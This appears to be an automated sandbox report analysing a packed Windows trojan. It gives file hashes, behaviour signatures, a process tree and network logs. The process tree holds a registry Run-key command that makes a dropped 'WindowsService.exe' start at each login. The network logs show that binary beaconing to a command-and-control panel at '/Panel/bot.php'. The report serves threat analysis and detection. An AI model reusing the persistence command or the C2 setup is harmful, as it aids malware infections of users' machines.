Analysis

  • max time kernel
    120s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12/09/2024, 00:57 UTC

General

  • Target

    95b0d03bc4d26ea0807cb0c4641f5930N.exe

  • Size

    102KB

  • MD5

    95b0d03bc4d26ea0807cb0c4641f5930

  • SHA1

    fef9dea05244afc84a22bcda36c076c7d18b0d83

  • SHA256

    867d0c72439bab748a559bd1b7bed3be2aa39fc44ad2c4ff0b56c2f4753222ff

  • SHA512

    01085cdabcb94df8f1ef41cb7a4ecc606ee55b3c2f1e065ec97e49f64c2b29adcf7d4c8323d89c8f8cd357470a72caa756a555e66f73bdb849d9776a7b96972e

  • SSDEEP

    3072:xFphTfm1UC7AdYzrV+Dljy/32ubwZZqJ:FhTfmuCkdYzrVolu/J0ZZ

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe
    "C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe
      "C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ETURA.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4492
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "sidebar" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe" /f
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4832
      • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
        "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3424
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3156

Network

  • US
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • US
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    ilovetehpussay.host4star.com
    WindowsService.exe
    Remote address:
    8.8.8.8:53
    Request
    ilovetehpussay.host4star.com
    IN A
    Response
    ilovetehpussay.host4star.com
    IN A
    185.53.177.50
  • DE
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    185.53.177.50:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 63
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 12 Sep 2024 00:57:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Buckets: bucket011
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fOpeG9Jo+3LAnHX84zQem3g959wl74UCbFwxHNQfDHvehzwRwkbGltpYepOcOKbLQDB5fckm80/1x9hOp1n9AQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Domain: host4star.com
    X-Subdomain: ilovetehpussay
  • DE
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    185.53.177.50:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 49
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 12 Sep 2024 00:57:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Buckets: bucket063
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fOpeG9Jo+3LAnHX84zQem3g959wl74UCbFwxHNQfDHvehzwRwkbGltpYepOcOKbLQDB5fckm80/1x9hOp1n9AQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Domain: host4star.com
    X-Subdomain: ilovetehpussay
  • US
    DNS
    50.177.53.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.177.53.185.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 185.53.177.50:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    1.1kB
    16.6kB
    19
    17

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php

    HTTP Response

    200
  • 185.53.177.50:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    1.1kB
    16.6kB
    19
    17

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    ilovetehpussay.host4star.com
    dns
    WindowsService.exe
    74 B
    90 B
    1
    1

    DNS Request

    ilovetehpussay.host4star.com

    DNS Response

    185.53.177.50

  • 8.8.8.8:53
    50.177.53.185.in-addr.arpa
    dns
    72 B
    150 B
    1
    1

    DNS Request

    50.177.53.185.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\ETURA.txt

    Filesize

    157B

    MD5

    f6a90c20834f271a907a4e2bc28184c2

    SHA1

    36c9d1602b74f622346fbb22693597d7889df48d

    SHA256

    73f29cd953eee40cea4de67842556ffd96efe8094a6a9b70f33a35df2582febd

    SHA512

    39cabae19fe1faa37455e4bd242c868be60d6252b07f01224b3f7501c3cf734e503300b840d83381a452707cab6df2f95f920655884be56d4024676b26943804

  • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe

    Filesize

    102KB

    MD5

    051a9c7258cafa027d5c6e96f93e6995

    SHA1

    285f95c6327322ec1438d3a698a44d3022256fe2

    SHA256

    2d6b8b201c157d71400042dd7fca33ab792ab5f51ba8f1ac6e48dc7fb1f4fe16

    SHA512

    a8774150ff2c6a4c4efca4f48d97d3076c9d3b5dbe3d7e9e8d13673c19111af7bf5b249b7284e304672e7428f459d86cf31a6dd511c6bdf886a4a4aa910e1722

  • memory/624-3-0x0000000002BC0000-0x0000000002BC1000-memory.dmp

    Filesize

    4KB

  • memory/624-6-0x0000000002C40000-0x0000000002C41000-memory.dmp

    Filesize

    4KB

  • memory/624-5-0x0000000002C00000-0x0000000002C01000-memory.dmp

    Filesize

    4KB

  • memory/624-4-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/624-0-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/624-12-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2184-40-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2184-13-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2184-9-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2184-62-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2184-7-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2184-60-0x0000000000410000-0x00000000004D9000-memory.dmp

    Filesize

    804KB

  • memory/3156-51-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

  • memory/3156-47-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

  • memory/3156-53-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

  • memory/3156-56-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

  • memory/3156-65-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

  • memory/3424-63-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/4720-42-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/4720-44-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/4720-59-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/4720-43-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/4720-36-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB